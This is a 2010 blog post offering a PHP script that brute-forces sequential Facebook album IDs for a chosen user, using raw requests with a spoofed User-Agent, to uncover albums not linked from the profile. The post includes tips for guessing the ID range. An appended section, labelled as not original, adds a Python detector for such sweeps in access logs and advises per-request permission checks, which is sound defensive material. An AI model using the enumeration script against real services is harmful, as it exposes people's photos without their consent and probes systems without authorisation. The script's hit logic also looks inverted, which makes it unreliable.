Nov 06 2010

Facebook ‘hacking’

Category: Linux, PHP, pseudo-hacks, Social | guillem @ 4:05 AM

The ‘hacking’ in the title is in quotation marks because this isn’t anything amazing. What I want to show you is a little PHP script I wrote a while ago that gathers the addresses of Facebook albums belonging to a specified profile. Obviously, that person must not have restricted the album, because in that case you won’t be able to see anything. But if the album is not restricted, you can see complete albums that you would not be able to access directly from Facebook. So you should take this as a ‘deobfuscation’ script more than a ‘hack’.

You should modify 3 parameters in the script itself:

– $uid: the Facebook user identifier of the person who owns the album you want to look for.

– $from and $to: the bounds of the album identifier range the script searches. These are the most difficult parameters to estimate. From what I’ve been able to see, album identifiers are assigned sequentially to every new album. The best way to estimate them is to find one of your friends’ profiles with an ID similar to the uid above, look at one of his/her albums, and use values of from and to around the album ID you just got (at least 500 below and above). This is not a very scientific approach, but it works and I can’t provide a better one at the moment. Maybe some day I will try to automate the script to estimate ‘from’ and ‘to’ as well, but that will be in the future…

<?php
//Set User ID here
$uid = 4;
//Album ID to start from. 'Guessing' required...
$from = 1;
//Album ID to finish at. 'Guessing' required...
$to = 500;

$server = gethostbyname( 'www.facebook.com' );

for ( $ii = $from; $ii < $to; $ii++ )
{
    sockAccess( $ii );
}

function sockAccess($ii)
{
    global $uid;
    $page = "album.php?aid=$ii&id=$uid";
    global $server;
    $errno = '';
    $errstr = '';
    // fsockopen() returns false on failure
    $fp = fsockopen( $server, 80, $errno, $errstr, 30 );
    if( $fp === false )
        die( "Error $errstr ($errno)" );

    $out = "GET /$page HTTP/1.1\r\n";
    $out .= "Host: $server\r\n";
    $out .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1";
    $out .= " en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite( $fp, $out );
    // Read only the status line, e.g. "HTTP/1.1 200 OK"
    $content = fgets( $fp );
    $code = trim( substr( $content, 9, 4 ) );
    fclose( $fp );
    // Any status other than 200 is reported as a hit
    if( $code != 200 )
        echo "Album found!: http://www.facebook.com/album.php?aid=$ii&id=$uid\n";
    // Progress message every 10 album IDs
    if( !($ii%10) )
        echo "Trying around: $ii\n";
    return true;
}
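
A defender's view of the same traffic, as an added example that is not part of the original post: the script requests album.php with a fixed id and an aid that increases by one on every request, and that pattern stands out in web server access logs. The log format, the sample lines, the function name find_album_sweeps and the thresholds are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined-log style), not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [06/Nov/2010:04:05:{i:02d} +0000] '
    f'"GET /album.php?aid={100 + i}&id=4 HTTP/1.1" 200 512'
    for i in range(30)
] + [
    '198.51.100.9 - - [06/Nov/2010:04:06:01 +0000] '
    '"GET /album.php?aid=2041&id=17 HTTP/1.1" 200 8812',
    '198.51.100.9 - - [06/Nov/2010:04:06:09 +0000] '
    '"GET /album.php?aid=77&id=23 HTTP/1.1" 200 9120',
]

REQ = re.compile(r'^(\S+) .*?"GET (\S+) HTTP/[\d.]+" (\d{3})')

def find_album_sweeps(lines, min_requests=20, min_sequential_ratio=0.8):
    """Return (client, owner_id, first_aid, last_aid, count) per suspected sweep."""
    seen = defaultdict(list)  # (client, owner id) -> album ids in request order
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        url = urlsplit(target)
        if url.path != "/album.php":
            continue
        q = parse_qs(url.query)
        try:
            aid, uid = int(q["aid"][0]), int(q["id"][0])
        except (KeyError, ValueError):
            continue  # missing or non-numeric parameters: not this pattern
        seen[(client, uid)].append(aid)
    alerts = []
    for (client, uid), aids in seen.items():
        if len(aids) < min_requests:
            continue
        # A sweep walks the id space one step at a time; browsing does not.
        steps = sum(1 for a, b in zip(aids, aids[1:]) if b - a == 1)
        ratio = steps / max(len(aids) - 1, 1)
        if ratio >= min_sequential_ratio:
            alerts.append((client, uid, min(aids), max(aids), len(aids)))
    return alerts

if __name__ == "__main__":
    print(find_album_sweeps(SAMPLE_LOG))
```

Detection only flags the behaviour; the underlying fix is for the server to check the viewer's permission on every album request, so that knowing or guessing an album ID grants nothing by itself.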
